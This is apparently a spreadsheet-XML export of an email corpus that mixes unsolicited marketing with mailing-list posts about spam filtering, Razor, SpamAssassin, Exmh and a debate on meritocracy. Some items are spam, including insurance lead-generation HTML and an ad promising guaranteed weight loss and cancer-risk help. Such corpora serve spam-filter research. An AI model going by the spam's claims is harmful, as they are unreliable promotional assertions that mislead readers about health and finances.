 size=3D"2"&gt;Heart Attack 1997 &amp; Pacemaker&lt;/font&gt;&lt;/td&gt;
           &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;Table 6&lt;/font&gt;&lt;/td&gt;
           &lt;td&gt;&lt;b&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2" =
 color=3D"#FF0000"&gt;Standard!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr bgcolor=3D"#FFFFFF"&gt;=20
           &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;Female&lt;/font&gt;&lt;/td&gt;
           &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;57&lt;/font&gt;&lt;/td&gt;
           &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;$500,000&lt;/font&gt;&lt;/td&gt;
           &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;Diabetic for 34 years&lt;/font&gt;&lt;/td&gt;
           &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;Table 4&lt;/font&gt;&lt;/td&gt;
           &lt;td&gt;&lt;b&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2" =
 color=3D"#FF0000"&gt;Standard!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr bgcolor=3D"#FFFFFF"&gt;=20
           &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;Male&lt;/font&gt;&lt;/td&gt;
           &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;51&lt;/font&gt;&lt;/td&gt;
           &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;$1,500,000&lt;/font&gt;&lt;/td&gt;
           &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;Alcohol Abuse (Dry 1 year)&lt;/font&gt;&lt;/td&gt;
           &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;Decline&lt;/font&gt;&lt;/td&gt;
           &lt;td&gt;&lt;b&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2" =
 color=3D"#FF0000"&gt;Standard!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr bgcolor=3D"#FFFFFF"&gt;=20
           &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;Male&lt;/font&gt;&lt;/td&gt;
           &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;50&lt;/font&gt;&lt;/td&gt;
           &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;$2,500,000&lt;/font&gt;&lt;/td&gt;
           &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;1/2 =
 pack a day cigarette smoker &lt;/font&gt;&lt;/td&gt;
           &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;Pref. Smoker&lt;/font&gt;&lt;/td&gt;
           &lt;td&gt;&lt;b&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2" =
 color=3D"#FF0000"&gt;Pref. Nonsmoker!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr bgcolor=3D"#FFFFFF"&gt;=20
           &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;Male&lt;/font&gt;&lt;/td&gt;
           &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;47&lt;/font&gt;&lt;/td&gt;
           &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;$2,000,000&lt;/font&gt;&lt;/td&gt;
           &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;Tobacco Chewer&lt;/font&gt;&lt;/td&gt;
           &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;Smoker&lt;/font&gt;&lt;/td&gt;
           &lt;td&gt;&lt;b&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2" =
 color=3D"#FF0000"&gt;Pref. Nonsmoker!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;br&gt;
       &lt;a =
 href=3D"http://nettrac.ipipeline.com/askdoctor/doctor.asp?gaid=3D0162"&gt;&lt;i=
 mg src=3D"http://63.211.81.87/images/tba4/numbers.gif" width=3D"548" =
 height=3D"213" border=3D"0" alt=3D'Visit us at www.tba.com or =
 800-624-4502x18'&gt;&lt;/a&gt;&lt;br&gt;
       &lt;form method=3D'post' =
 action=3D'http://65.217.159.103/response/response.asp'&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"2" =
 cellpadding=3D"2" align=3D"center"&gt;
           &lt;tr&gt;=20
             &lt;td colspan=3D"4" align=3D"center" height=3D"19"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;Please fill out the =
 form below for more information&lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"15%" align=3D"right"&gt;&lt;font face=3D"Arial, =
 Helvetica, sans-serif" size=3D"2"&gt;Name:&lt;/font&gt;&lt;/td&gt;
             &lt;td colspan=3D"3"&gt; &lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;=20
               &lt;input type=3D"text" name=3D"Name" size=3D"50"&gt;
               &lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"15%" align=3D"right"&gt;&lt;font face=3D"Arial, =
 Helvetica, sans-serif" size=3D"2"&gt;E-mail:&lt;/font&gt;&lt;/td&gt;
             &lt;td colspan=3D"3"&gt; &lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;=20
               &lt;input type=3D"text" name=3D"Email" size=3D"50"&gt;
               &lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"15%" align=3D"right"&gt;&lt;font face=3D"Arial, =
 Helvetica, sans-serif" size=3D"2"&gt;Phone:&lt;/font&gt;&lt;/td&gt;
             &lt;td colspan=3D"3"&gt; &lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;=20
               &lt;input type=3D"text" name=3D"Phone" size=3D"50"&gt;
               &lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"15%" align=3D"right"&gt;&lt;font face=3D"Arial, =
 Helvetica, sans-serif" size=3D"2"&gt;City:&lt;/font&gt;&lt;/td&gt;
             &lt;td width=3D"30%"&gt; &lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;=20
               &lt;input type=3D"text" name=3D"City" size=3D"20"&gt;
               &lt;/font&gt;&lt;/td&gt;
             &lt;td width=3D"15%" align=3D"right"&gt;&lt;font face=3D"Arial, =
 Helvetica, sans-serif" size=3D"2"&gt;State:&lt;/font&gt;&lt;/td&gt;
             &lt;td width=3D"40%"&gt; &lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;=20
               &lt;input type=3D"text" name=3D"State" size=3D"2"&gt;
               &lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
             &lt;td width=3D"30%"&gt;=20
               &lt;input type=3D"submit" name=3D"btnsubmit" =
 value=3D"Submit"&gt;
             &lt;/td&gt;
             &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
             &lt;td width=3D"40%"&gt;=20
               &lt;input type=3D"hidden" name=3D"hdnRecipientTxt" =
 value=3D"impairedrisk@tba.com"&gt;
               &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" value=3D"TBA =
 Form Response"&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
       &lt;/form&gt;
       &lt;p align=3D"left"&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"1"&gt;
         We don't want anybody to receive our mailings who does not wish=20
         to receive them. This is professional communication=20
         sent to insurance professionals. To be removed from this mailing =
 list,=20
         DO NOT REPLY to this message. Instead, go here: &lt;a =
 href=3D"http://www.InsuranceIQ.com/optout"&gt;http://www.InsuranceIQ.com/opt=
 out&lt;/a&gt;
         &lt;/font&gt;&lt;/p&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;img height=3D'1' width=3D'1' border=3D'0' src=3D'304704'&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_1EA50_01C1D02A.8CB39DF0--
</t>
  </si>
  <si>
    <t xml:space="preserve">Guido van Rossum wrote:
 &gt; I personally don't think IMAP has a bright future, but for people who
 &gt; do use it, that's certainly a good approach.
 Writing an IMAP server is a non-trivial task.  The specification is huge
 and clients do all kinds of weird stuff.  POP is very easy in
 comparison.  Perhaps you could forward messages to a special address or
 save them in a special folder to mark them as false negatives.
 Alternatively, perhaps there could be a separate protocol and client
 that could be used to review additions to the training set.  Each day a
 few random spam and ham messages could be grabbed as candidates.
 Someone would periodically startup the client, review the candidates,
 reclassify or remove any messages they don't like and add them to the
 training set.
   Neil
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] razor vs cloudmark - merging?
</t>
  </si>
  <si>
    <t xml:space="preserve">I am somewhat puzzled by a phone call I (or rather the CIO at the ISP for
 whom I work) received from an individual claiming to represent Cloudmark.
 The gist of the call was that since we were using razor and checking our
 mail against the razor servers and that since those servers contain
 information proprietary to Cloudmark, we would [in the near future?] be
 required to begin paying Cloudmark/spamnet $1.00/user per year. I was
 wondering if anyone else has received such a call?
 I am curious as to whether a spammer has begun to try contacting razor users
 with the above tactic in an effort to get them to stop using razor or
 whether the open source/community aspect of the razor project is going by
 the wayside in lieu of a strictly commercial approach (ala brightmail and
 the likes).
 Sven
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG-Social] re: Guaranteed to lose 10-12 lbs in 30 days 10.148
</t>
  </si>
  <si>
    <t xml:space="preserve">I thought you might like these:
 1) Slim Down - Guaranteed to lose 10-12 lbs in 30 days
 http://www.freeyankee.com/cgi/fy2/to.cgi?l=822slim1
 2) Fight The Risk of Cancer! 
 http://www.freeyankee.com/cgi/fy2/to.cgi?l=822nic1 
 3) Get the Child Support You Deserve - Free Legal Advice 
 http://www.freeyankee.com/cgi/fy2/to.cgi?l=822ppl1
 Offer Manager
 Daily-Deals
 If you wish to leave this list please use the link below.
 http://www.qves.com/trim/?social@linux.ie%7C29%7C134077
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] updating SA
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 2002-08-28 at 13:57, Michael Clark wrote:
 &gt; To update spamassasin, all I need to do is install the new tar.gz 
 &gt; file as if it were a new installation? I don't need to stop incoming 
 &gt; mail or anything like that? Thanks, Mike
 If you are using spamd, you will have to stop/restart it. 
 -- 
 Larry Rosenman                     http://www.lerctr.org/~ler
 Phone: +1 972-414-9812                 E-Mail: ler@lerctr.org
 US Mail: 1905 Steamboat Springs Drive, Garland, TX 75044-6749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</si>
  <si>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Pluck and Luck
</t>
  </si>
  <si>
    <t xml:space="preserve">Anyone who doesn't appreciate both PLUCK and LUCK is only looking at
 part of the equation.
 America has, in fact, moved hard toward Meritocracy.  But -- and this is
 a huge one -- you don't necessarily find it on the Forbes list.  There
 is an element of LUCK, even if only being in the right place at the
 right time, to go that high.
 Beyond the Forbes List, there are many ways in which almost pure LUCK is
 involved in significant wealth.  Being a super-model, for example.
 Though I think most people would be surprised by a lot of super-models.
 Cindy Crawford was valedictorian of her high school.
 Most people, of course, aren't in those stratified realms.  It is the
 rest of us who tend to sort.
 There is a huge philosophical problem with the concept of Merit in the
 first place.  Rawls claims Merit doesn't exist.  Sowell seems to agree
 at least in part, but I'm sure Sowell would also state that the benefits
 of pretending it exists for society at large are enormous.
 And if Merit does exist then exactly what is it measuring?  IQ?  Purity
 of heart?  Or the ability to satisfy customers?  Functionally most
 people seem to equate Merit with IQ though they say it would be better
 if it were purity of heart.  Yet the type of Merit that lands you on the
 Forbes list, or even just being a garden variety 'millionaire next door'
 is more likely to be the 'serving customers' definition.
 Differences due to merit, when they are perceived as such, generate far
 more animosity than differences due to luck.  Luck can be forgiven.
 Superior performance, often not.
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 Geege
 &gt; Schuman
 &gt; Sent: Monday, September 23, 2002 4:44 PM
 &gt; To: R. A. Hettinga; Geege Schuman; Owen Byrne
 &gt; Cc: Gary Lawrence Murphy; Mr. FoRK; fork@spamassassin.taint.org; Digital Bearer
 &gt; Settlement List
 &gt; Subject: RE: Comrade Communism (was Re: Crony Capitalism (was RE: sed
 &gt; /s/United States/Roman Empire/g))
 &gt; 
 &gt; First, misattribution.  I did not write the blurb below.  I made one
 &gt; statement about VP Cheney only, to wit, that he has a short memory.
 &gt; 
 &gt; I couldn't agree with you more on this: "in short, then, economics is
 not
 &gt; a
 &gt; zero sum game, property is not theft, the rich don't get rich off the
 &gt; backs
 &gt; of the poor, and redistributionist labor "theory" of value happy
 horseshit
 &gt; is just that: horseshit, happy or otherwise," however, I resent being
 &gt; lumped
 &gt; in a zero-sum-zealot category for suggesting nothing more than that
 rich
 &gt; and
 &gt; successful at face value is apropos of nothing and I am beginning to
 &gt; understand that people who immediately and so fiercely object to my ad
 &gt; hominem (re Cheney) align themselves weird sylogisms like "if rich
 then
 &gt; deservedly" or "if rich then smarter."  Given that, I am also
 beginning to
 &gt; understand why some people NEED to be rich.
 &gt; 
 &gt; WRT to meritocracies - all hail, meritocracies!  WRT Harvard: over 90%
 of
 &gt; 2002 graduates were cum laude +. INTERESTING curve.  Those eager to be
 &gt; measured got their wish; those unwashed shy folk who just live it
 provide
 &gt; the balast.
 &gt; 
 &gt; Speaking of Forbes, was reading about Peter Norton just today in an
 old
 &gt; issue while waiting for my doctor.  Norton attributes his success to
 LUCK.
 &gt; Imagine.
 &gt; 
 &gt; Geege
 &gt; 
 &gt; -----Original Message-----
 &gt; From: R. A. Hettinga [mailto:rah@shipwright.com]
 &gt; Sent: Sunday, September 22, 2002 10:01 PM
 &gt; To: Geege Schuman; Owen Byrne
 &gt; Cc: Gary Lawrence Murphy; Mr. FoRK; fork@spamassassin.taint.org; Digital Bearer
 &gt; Settlement List
 &gt; Subject: Comrade Communism (was Re: Crony Capitalism (was RE: sed
 &gt; /s/United States/Roman Empire/g))
 &gt; 
 &gt; 
 &gt; -----BEGIN PGP SIGNED MESSAGE-----
 &gt; Hash: SHA1
 &gt; 
 &gt; At 11:15 AM -0400 on 9/22/02, Geege Schuman wrote:
 &gt; 
 &gt; 
 &gt; &gt; Most of them seem to have Ivy League educations, or are Ivy League
 &gt; &gt; dropouts suggesting to me that they weren't exactly poor to start
 &gt; &gt; with.
 &gt; 
 &gt; Actually, if I remember correctly from discussion of the list's
 &gt; composition in Forbes about five or six years ago, the *best* way to
 &gt; get on the Forbes 400 is to have *no* college at all. Can you say
 &gt; "Bootstraps", boys and girls? I knew you could...
 &gt; 
 &gt; [Given that an undergraduate liberal arts degree from a state school,
 &gt; like, say, mine, :-), is nothing but stuff they should have taught
 &gt; you in a government-run "high" school, you'll probably get more of
 &gt; *those* on the Forbes 400 as well as time goes on. If we ever get
 &gt; around to having a good old fashioned government-collapsing
 &gt; transfer-payment depression (an economic version of this summer's
 &gt; government-forest conflagration, caused by the same kind of
 &gt; innumeracy that not clear-cutting enough forests did out west this
 &gt; summer :-)) that should motivate more than a few erst-slackers out
 &gt; there, including me, :-), to learn to actually feed themselves.]
 &gt; 
 &gt; 
 &gt; The *next* category on the Forbes 400 list is someone with a
 &gt; "terminal" professional degree, like an MBA, PhD, MD, etc., from the
 &gt; best school possible.
 &gt; 
 &gt; Why? Because, as of about 1950, the *best* way to get into Harvard,
 &gt; for instance, is to be *smart*, not rich. Don't take my word for it,
 &gt; ask their admissions office. Look at the admissions stats over the
 &gt; years for proof.
 &gt; 
 &gt; Meritocracy, American Style, was *invented* at the Ivy League after
 &gt; World War II. Even Stanford got the hint, :-), and, of course,
 &gt; Chicago taught them all how, right? :-). Practically *nobody* who
 &gt; goes to a top-20 American institution of higher learning can actually
 &gt; afford to go there these days. Unless, of course, their parents, who
 &gt; couldn't afford to go there themselves, got terminal degrees in the
 &gt; last 40 years or so. And their kids *still* had to get the grades,
 &gt; and "biased" (by intelligence :-)), test scores, to get in.
 &gt; 
 &gt; 
 &gt; The bizarre irony is that almost all of those people with "terminal"
 &gt; degrees, until they actually *own* something and *hire* people, or
 &gt; learn to *make* something for a living all day on a profit and loss
 &gt; basis, persist in the practically insane belief, like life after
 &gt; death, that economics is some kind of zero sum game, that dumb people
 &gt; who don't work hard for it make all the money, and, if someone *is*
 &gt; smart, works hard, and is rich, then they stole their wealth somehow.
 &gt; 
 &gt; BTW, none of you guys out there holding the short end of this
 &gt; rhetorical stick can blame *me* for the fact that I'm using it to
 &gt; beat you severely all over your collective head and shoulders. You
 &gt; were, apparently, too dumb to grab the right end. *I* went to
 &gt; Missouri, and *I* don't have a degree in anything actually useful,
 &gt; much less a "terminal" one, which means *I*'m broker than anyone on
 &gt; this list -- it's just that *you*, of all people, lots with
 &gt; educations far surpassing my own, should just plain know better. The
 &gt; facts speak for themselves, if you just open your eyes and *look*.
 &gt; There are no epicycles, the universe does not orbit the earth, and
 &gt; economics is not a zero-sum game. The cost of anything, including
 &gt; ignorance and destitution, is the forgone alternative, in this case,
 &gt; intelligence and effort.
 &gt; 
 &gt; [I will, however, admit to being educated *waay* past my level of
 &gt; competence, and, by the way *you* discuss economics, so have you,
 &gt; apparently.]
 &gt; 
 &gt; 
 &gt; 
 &gt; BTW, if we ever actually *had* free markets in this country,
 &gt; *including* the abolition of redistributive income and death taxes,
 &gt; all those smart people in the Forbes 400 would have *more* money, and
 &gt; there would be *more* self-made people on that list. In addition,
 &gt; most of the people who *inherited* money on the list would have
 &gt; *much* less of it, not even relatively speaking. Finally, practically
 &gt; all of that "new" money would have come from economic efficiency and
 &gt; not "stolen" from someone else, investment bubbles or not.
 &gt; 
 &gt; That efficiency is called "progress", for those of you in The
 &gt; People's Republics of Berkeley or Cambridge. It means more and better
 &gt; stuff, cheaper, over time -- a terrible, petit-bourgeois concept
 &gt; apparently not worthy of teaching by the educational elite, or you'd
 &gt; know about it by now. In economic terms, it's also called an increase
 &gt; in general welfare, and, no, Virginia, I'm not talking about
 &gt; extorting money from someone who works, and giving it to someone who
 &gt; doesn't in order to keep them from working and they can think of some
 &gt; politician as Santa Claus come election time...
 &gt; 
 &gt; 
 &gt; In short, then, economics is not a zero sum game, property is not
 &gt; theft, the rich don't get rich off the backs of the poor, and
 &gt; redistributionist labor "theory" of value happy horseshit is just
 &gt; that: horseshit, happy or otherwise.
 &gt; 
 &gt; To believe otherwise, is -- quite literally, given the time Marx
 &gt; wrote Capital and the Manifesto -- romantic nonsense.
 &gt; 
 &gt; Cheers,
 &gt; RAH
 &gt; 
 &gt; -----BEGIN PGP SIGNATURE-----
 &gt; Version: PGP 7.5
 &gt; 
 &gt; iQA/AwUBPY511cPxH8jf3ohaEQLAsgCfZhsQMSvUy6GqJ5wgL52DwZKpIhMAnRuR
 &gt; YYboc+IcylP5TlKL58jpwEfu
 &gt; =z877
 &gt; -----END PGP SIGNATURE-----
 &gt; 
 &gt; --
 &gt; -----------------
 &gt; R. A. Hettinga &lt;mailto: rah@ibuc.com&gt;
 &gt; The Internet Bearer Underwriting Corporation &lt;http://www.ibuc.com/&gt;
 &gt; 44 Farquhar Street, Boston, MA 02131 USA
 &gt; "... however it may deserve respect for its usefulness and antiquity,
 &gt; [predicting the end of the world] has not been found agreeable to
 &gt; experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
 &gt; 
 &gt; 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: gentoo 0.11.31 relased...
</t>
  </si>
  <si>
    <t xml:space="preserve">..it's a major release and supports now SGI's FAM technology
 (see http://www.oss.sgi.com/projects/fam/), meaning gentoo will
 now be aware of changes made to the directories it's viewing.
 More details see emils ChangeLog on 
 https://sourceforge.net/project/shownotes.php?release_id=103492
 --
 regards from Germany
                    Matthias
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_267413022P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Anders Eriksson &lt;aeriksson@fastmail.fm&gt;
 &gt; Date:  Thu, 22 Aug 2002 20:23:17 +0200
 &gt;
 &gt; 
 &gt; Oooops!
 &gt; 
 &gt; Doesn't work at all. Got this on startup and on any attempt to change folde
 &gt; r (which fail)
 ~sigh~  I'd already found that and checked it in....apparently I did so after 
 you checked it out and before you sent this mail...I hoped I was fast enough 
 that you wouldn't see it.
 Try again!
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_267413022P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9ZUlVK9b4h5R0IUIRAr4LAJ9Mhzgw03dF2qiyqtMks72364uaqwCeJxp1
 23jNAVlrHHIDRMvMPXnfzoE=
 =HErg
 -----END PGP SIGNATURE-----
 --==_Exmh_267413022P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Free Sizzling LTC Sales Materials
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_197EA3_01C2001F.877BF830
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  FREE	 Sizzling LTC Sales Materials	
  Catch the LTC Advantage!	
 LTC Prospecting Pamplets	 LTC Scriptless Flip Chart	 
 25 of "What is Long Term Care?"
 or
 25 of "6 Big Myths of Long Term Care"
 Help your clients see the facts and figures needed in order to
 understand the Long Term Care Insurance market. Help them to learn what
 LTCI actually is and how important it is to their financial future.
 Yours FREE with your first appointment! 
 "Your Options for Long Term Care"
 Unique Scriptless Flip Chart
 Includes our 11-Step Sales Presentation!
 Contrast the value of Long Term Care Insurance against Medicare,
 Medicaid and family care -- showing that LTCI is the alternative that
 makes sense. Statistically prove the importance of LTCI for your
 clients' twilight years.
 Yours FREE with your first application! 
 FREE Pamphlet Samples With Inquiry!
     Don't forget to ask about...
    OUR FULL PORTFOLIO OF SENIOR PRODUCTS 	
 LTC Annuity	 Lead Programs	 
 Medicare Supplement	 LTCI Sales Training	 
 Final Expense	 Career Opportunities	 
 Call or e-mail &lt;mailto:info@ltcadvantage.net&gt;  LTC Advantage today! 	
  877-292-8996	
 ? or ?
 Please fill out the form below for more information	 
 Name:	  	
 E-mail:	  	
 Phone:	  	
 City:	  	State:	  	
 LTC Advantage: Specializing in LTCI for over 15 years.
 &lt;http://www.ltcadvantage.net&gt;  	
 We don't want anybody to receive our mailings who does not wish to
 receive them. This is professional communication sent to insurance
 professionals. To be removed from this mailing list, DO NOT REPLY to
 this message. Instead, go here: http://www.InsuranceIQ.com/optout
 ------=_NextPart_000_197EA3_01C2001F.877BF830
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Free Sizzling LTC Sales Materials&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#000033" text=3D"#000000"&gt;
 &lt;table width=3D"550" cellpadding=3D"2" cellspacing=3D"2" =
 bgcolor=3D"#000000" align=3D"center"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;=20
       &lt;table width=3D"100%" cellpadding=3D"2" cellspacing=3D"2" =
 border=3D"0" bgcolor=3D"#ffffff"&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"right"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/LTCAdv/20020319-102.jpg" width=3D"281" =
 height=3D"158" alt=3D"FREE"&gt;&lt;/td&gt;
           &lt;td&gt;&lt;img =
 src=3D"http://63.211.81.87/images/LTCAdv/20020319-103.gif" width=3D"242" =
 height=3D"158" alt=3D"Sizzling LTC Sales Materials"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td colspan=3D"2" align=3D"center"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/LTCAdv/20020319-106.gif" width=3D"523" =
 height=3D"47" alt=3D"Catch the LTC Advantage!"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr valign=3D"bottom"&gt;=20
           &lt;td align=3D"center"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/LTCAdv/20020319-109.jpg" width=3D"191" =
 height=3D"236"&gt;&lt;/td&gt;
           &lt;td align=3D"center"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/LTCAdv/20020319-112.jpg" width=3D"231" =
 height=3D"194"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr valign=3D"bottom" bgcolor=3D"#000066"&gt;=20
           &lt;td align=3D"center"&gt;&lt;b&gt;&lt;font size=3D"3" face=3D"Arial, =
 Helvetica, sans-serif" color=3D"#FFFFFF"&gt;LTC Prospecting =
 Pamplets&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
           &lt;td align=3D"center"&gt;&lt;b&gt;&lt;font size=3D"3" face=3D"Arial, =
 Helvetica, sans-serif" color=3D"#FFFFFF"&gt;LTC Scriptless Flip =
 Chart&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr valign=3D"top" bgcolor=3D"#CCCCCC"&gt;=20
           &lt;td&gt;=20
             &lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2" =
 color=3D"#000000"&gt;=20
             &lt;p align=3D"center"&gt;&lt;b&gt;25 of "What is Long Term =
 Care?&amp;quot;&lt;br&gt;
               or&lt;br&gt;
               25 of "6 Big Myths of Long Term Care"&lt;/b&gt;&lt;/p&gt;
             &lt;p&gt;Help your clients see the facts and figures needed in =
 order to=20
               understand the Long Term Care Insurance market. Help them =
 to learn=20
               what LTCI actually is and how important it is to their =
 financial future.&lt;br&gt;
               &amp;nbsp;&lt;/p&gt;
             &lt;center&gt;
               &lt;font color=3D"#000066"&gt;&lt;b&gt;Yours FREE with your first =
 appointment!&lt;/b&gt;&lt;/font&gt;=20
             &lt;/center&gt;
             &lt;/font&gt;
           &lt;/td&gt;
           &lt;td&gt; &lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2" =
 color=3D"#000000"&gt;=20
             &lt;p align=3D"center"&gt;&lt;b&gt;"Your Options for Long Term Care"&lt;br&gt;
               Unique Scriptless Flip Chart&lt;br&gt;
               &lt;font size=3D"1" color=3D"#FF0000"&gt;Includes our 11-Step =
 Sales Presentation!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
             &lt;p&gt;&lt;img src=3D"spacer.gif" width=3D"1" =
 height=3D"18"&gt;Contrast the value of=20
               Long Term Care Insurance against Medicare, Medicaid and =
 family care=20
               -- showing that LTCI is the alternative that makes sense. =
 Statistically=20
               prove the importance of LTCI for your clients' twilight =
 years.&lt;/p&gt;
             &lt;center&gt;
               &lt;font color=3D"#000066"&gt;&lt;b&gt;Yours FREE with your first =
 application!&lt;/b&gt;&lt;/font&gt;=20
             &lt;/center&gt;
             &lt;/font&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td colspan=3D"2"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/LTCAdv/spacer.gif" width=3D"1" =
 height=3D"5"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td colspan=3D"2" align=3D"center"&gt;
             &lt;i&gt;&lt;b&gt;&lt;font color=3D"#000000" size=3D"4" face=3D"Arial, =
 Helvetica, sans-serif"&gt;FREE Pamphlet Samples With =
 Inquiry!&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;&lt;br&gt;
             &lt;img src=3D"http://63.211.81.87/images/LTCAdv/spacer.gif" =
